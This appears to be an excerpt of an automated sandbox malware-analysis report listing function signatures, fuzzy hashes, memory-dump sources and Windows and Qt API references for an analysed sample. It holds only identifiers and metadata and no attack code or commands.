                                                                                                                                                                                                                • Opcode Fuzzy Hash: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD418531A1D68691EA11DB20E4541EA6351FF5D38CFA08172DA5EC36F5EF3CE925C780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?start@NoneStructTimer@@
                                                                                                                                                                                                                • String ID: QTimer$start$start(self, msec: int)start(self)
                                                                                                                                                                                                                • API String ID: 4098203657-267663400
                                                                                                                                                                                                                • Opcode ID: b83a7a136226d26a0f7808af050f5b5f9312356ee9d83e0da242e174b8d0ec16
                                                                                                                                                                                                                • Instruction ID: 3579542283e94ba16e29736bc8f9ce8075d8bca0e729b48a4e5a85dc4cc4dbfa
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b83a7a136226d26a0f7808af050f5b5f9312356ee9d83e0da242e174b8d0ec16
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A214FB1A19F46C1EB00CF25E888AA933A5FB88B80F544132DA4D13334EF7DD599C744
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1279662727-0
                                                                                                                                                                                                                • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                • Instruction ID: 6d6d322bebb057840c5c73f79c527b160407f68bfbf9b15734721d2f5672a8c0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46419562D2878183E7508B2095103797361FBA9BA8F20D375E65EC3AE5EF7CA5E08700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3251591375-0
                                                                                                                                                                                                                • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                • Instruction ID: c56c74d85aff2acbc074982f6cea31dd11975b0f34c23d6eb3fe973c71c913ec
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C312821E0C14741FA24AB65E4123BD2681DF4A78CF64D4B5DA0FCB2F7DE6DAC248281
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?timerEvent@Event@@@TimerTimer@@
                                                                                                                                                                                                                • String ID: timerEvent
                                                                                                                                                                                                                • API String ID: 1835720796-70242871
                                                                                                                                                                                                                • Opcode ID: 78a27a10361aba426dca180bcdaa95610b9992e36a468f65782a271acd82be29
                                                                                                                                                                                                                • Instruction ID: 5aa195cf5e2ea4f22e469d9fcebf1550273e53d70774441a97593dfa3c135e30
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78a27a10361aba426dca180bcdaa95610b9992e36a468f65782a271acd82be29
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1113DB6609B8182DB10CB16F44469AB7A1FB88BD4F480132EE8D13B28EF7CD155CB44
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?event@Event@@@Object@@
                                                                                                                                                                                                                • String ID: event
                                                                                                                                                                                                                • API String ID: 1632091246-1001261735
                                                                                                                                                                                                                • Opcode ID: b9fcad76344d3b6d83e7c4e04f4f486b57c8e5d274152873806102f35161bfd4
                                                                                                                                                                                                                • Instruction ID: b95bfde70280e1556ccfe63518bc5bb7540c6899218eabfb7367bb1fe9ca5690
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9fcad76344d3b6d83e7c4e04f4f486b57c8e5d274152873806102f35161bfd4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95015EA6609B8182EA109B15F5405AAA770F788BD4B584132DF8C13B28EF7CD155CB40
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                • Instruction ID: 87776c4263f3e764c2b79056b40d793a0c82d6552423447f06667bb5366c77c5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B951C461B0924186F7689A25940877A66D1AF4CFACF28C674DD6EC77E5EF3CE5018600
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                                                • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                • Instruction ID: 47e60541e81210fce3ff795e380b23155e2cbc4f3b74d81265a6435ab31eef40
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF11BF62608B81C1DA208B25A854169B361EB49FF8F648371EE7ECB7E9DF7CD0118740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,00007FF60B13A9D5,?,?,00000000,00007FF60B13AA8A), ref: 00007FF60B13ABC6
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF60B13A9D5,?,?,00000000,00007FF60B13AA8A), ref: 00007FF60B13ABD0
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 918212764-0
                                                                                                                                                                                                                • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                • Instruction ID: 9728cc143d3356044112bd45254a15fcc8725c36bf252448fd463b32f3621fd5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D219621B2C68241FAA45761949537D26939F8CFACF28C2B9E96FC77F5EE6CE4414300
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                • Instruction ID: a285b2c863029249d3c3b708c4081d048737345a7841394fcb7065cca7ac9d8c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC41E23291C24187EA348B19A44027A77A4EF5DF88F249175DA9FC36E1EF2DE402CB50
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _fread_nolock
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 840049012-0
                                                                                                                                                                                                                • Opcode ID: c6682db64852707600c43fb891f4de48ebc266699440c3858ac7b9af290251f5
                                                                                                                                                                                                                • Instruction ID: de90cee15de34bfb5b83af53d0535a9c43f6fc3d2dec993c11de0e340486ce11
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6682db64852707600c43fb891f4de48ebc266699440c3858ac7b9af290251f5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8421B421B1865246FB149B2269047BA9641BF4EFCCFAC84B0EE0EC7796DE7DE851C204
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                • Instruction ID: ac2693c59966f5d2fb07de2ab10eb92b84f9efae255f1a4c8ba3276f58e0fa6c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF319062A1C60285F751AB55884137D2A90AF88FA8F6181B5EA5FC73F2FFBCE4418711
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                • Instruction ID: 869402602c92ce21047ff13f0c927ea38131545fd0c9073769163ab8c4f1e21a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8117531A1C64182EA609F11940027DA665BF9DF8CF6484B1EF8ED7BB6EF3DD4005740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                • Instruction ID: 9196e01f606d361ec137923b66af36539b4dc58b453cea1e909d445c4b13d9f9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4216272A18A8186DB618F18D44037976A0FB89B5CF3882B4E75EC76E9DF3DD911CB00
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                • Instruction ID: f896f5760be44385bc05e3053ea87d966cbaebd9509bb33806e6730e59e5015a
